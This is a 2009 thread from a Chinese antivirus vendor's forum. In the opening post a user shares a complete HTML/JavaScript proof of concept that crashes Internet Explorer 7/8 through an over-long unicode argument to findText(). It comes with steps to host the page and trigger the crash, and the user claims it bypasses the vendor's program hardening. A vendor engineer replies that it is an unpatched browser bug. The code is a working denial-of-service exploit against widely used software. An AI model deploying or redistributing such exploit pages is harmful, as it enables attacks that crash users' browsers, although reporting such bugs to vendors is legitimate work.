继续来一段公开的代码，过RIS一切组件（包括程序加固） - 瑞星卡卡安全论坛bbs.ikaka.com

瑞星卡卡安全论坛企业产品讨论区 瑞星2010新品体验挑战专区继续来一段公开的代码，过RIS一切组件（包括程序加固）

	瑞星“1+2”全新解决方案巡展在广州画上圆满句号		叶院长揭秘：瑞星如何运用AI技术革新网络安全		俄乌冲突加剧网络攻击风险白俄罗斯政府遭APT攻击		瑞星ESM防病毒系统助力矿业大学筑牢网络安全防线
	实力拉满瑞星第四十七次通过VB100测评		携手老友，拥抱新精彩 —— 新论坛新活动，感谢你的陪伴		护航司法，瑞星助力山西省高院构建安全防线		人工智能在网络安全领域的风险和机遇

1

1 / 1 页

跳转页

继续来一段公开的代码，过RIS一切组件（包括程序加固）

taylor05771 社区嘉宾帖子:7232 注册: 2003-12-24 来自:	发表于： 2009-07-28 11:23 \| 只看楼主短消息资料字号：小中大 1楼继续来一段公开的代码，过RIS一切组件（包括程序加固）这段代码可以导致IE 7 IE8 拒绝服务无论你IE是否在RIS的程序加固中，结果是不会改变的也就是说该崩溃还是崩溃，即便IE在程序加固中。。。。。把下面的代码保存成HTML文件，放到服务器上。用IE 7 或者IE8访问，点击页面上的HIT 即可造成崩溃。。。。。秋日的童话 LMhust 参与了测试 [复制到剪贴板] CODE: <meta http-equiv="Context-Type" content="text/html; charset=US-ASCII"> --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><title>IE findText crash</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body> <input type="button" value="HIT" onclick="do_crash();"> Hit the button after ie7/8 crash.. <script> function do_crash() { var o1=document.createElement("input"); o1.type="text"; //or password o1.id="powerhacker"; o1.value="AAAA"; document.body.appendChild(o1); var r= o1.createTextRange(); r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1); //maybe string length allocated stack but over length allocated heap memory //r.findText(unescape("%u4141%u4141%u4141%u4141%u4242%u4242%u4242%u4242%u4343%u4343%u4343%u4343%u4444%u4444%u4444%u4444%u4545%u4545%u4545%u4545"),-1,131072); //this code is no crash becase 3 parameter } </script> </body></html> <html><body></body></html>
taylor05771 社区嘉宾帖子:7232 注册: 2003-12-24 来自:	分享到：

tyryrtytry 在线工程师帖子:1545 注册: 2009-06-23 来自:	发表于： 2009-07-28 11:24 \| 短消息资料字号：小中大 2楼回复：继续来一段公开的代码，过RIS一切组件（包括程序加固）提交检测，感谢您的支持
tyryrtytry 在线工程师帖子:1545 注册: 2009-06-23 来自:

鬼鬼小猫咪高贵耄耋狮帖子:60938 注册: 2008-04-22 来自:喵星	发表于： 2009-07-28 11:24 \| 短消息资料字号：小中大 3楼回复：继续来一段公开的代码，过RIS一切组件（包括程序加固）已收藏,楼主辛苦了.
鬼鬼小猫咪高贵耄耋狮帖子:60938 注册: 2008-04-22 来自:喵星

瑞星工程师12 在线技术支持工程师帖子:21624 注册: 2008-09-08 来自:RISING	发表于： 2009-07-30 12:52 \| 短消息资料字号：小中大 4楼回复：继续来一段公开的代码，过RIS一切组件（包括程序加固）这是微软的Internet Explorer使用'findText()'方法在处理特殊构建的包含unicode字符的参数时存在问题导致崩溃，微软目前未就这一问题提供修复补丁。由于不是病毒导致的崩溃，所以无法进行处理。欢迎加入瑞星杀毒软件QQ群 47032532 瑞星个人防火墙QQ群 204732153 瑞星路由安全卫士QQ群 213941034 瑞星安全WiFi QQ群 81864985 瑞星手机安全助手QQ群 64866930
瑞星工程师12 在线技术支持工程师帖子:21624 注册: 2008-09-08 来自:RISING

taylor05771 社区嘉宾帖子:7232 注册: 2003-12-24 来自:	发表于： 2009-07-30 13:29 \| 只看楼主短消息资料字号：小中大 5楼回复: 继续来一段公开的代码，过RIS一切组件（包括程序加固）引用: 原帖由瑞星工程师12 于 2009-7-30 12:52:00 发表这是微软的Internet Explorer使用'findText()'方法在处理特殊构建的包含unicode字符的参数时存在问题导致崩溃，微软目前未就这一问题提供修复补丁。由于不是病毒导致的崩溃，所以无法进行处理。代码是干啥的我一清二楚，而且补漏是微软的事情。话说有补丁的我就不发了。。。。。但是问题出在程序加固，既然程序加固能加固IE，为什么无法拦截这类针对IE 拒绝服务攻击？？这才是我要问的
taylor05771 社区嘉宾帖子:7232 注册: 2003-12-24 来自:

<<上一主题|下一主题>>

1

1 / 1 页

跳转页

页面顶部

Powered by Discuz!NT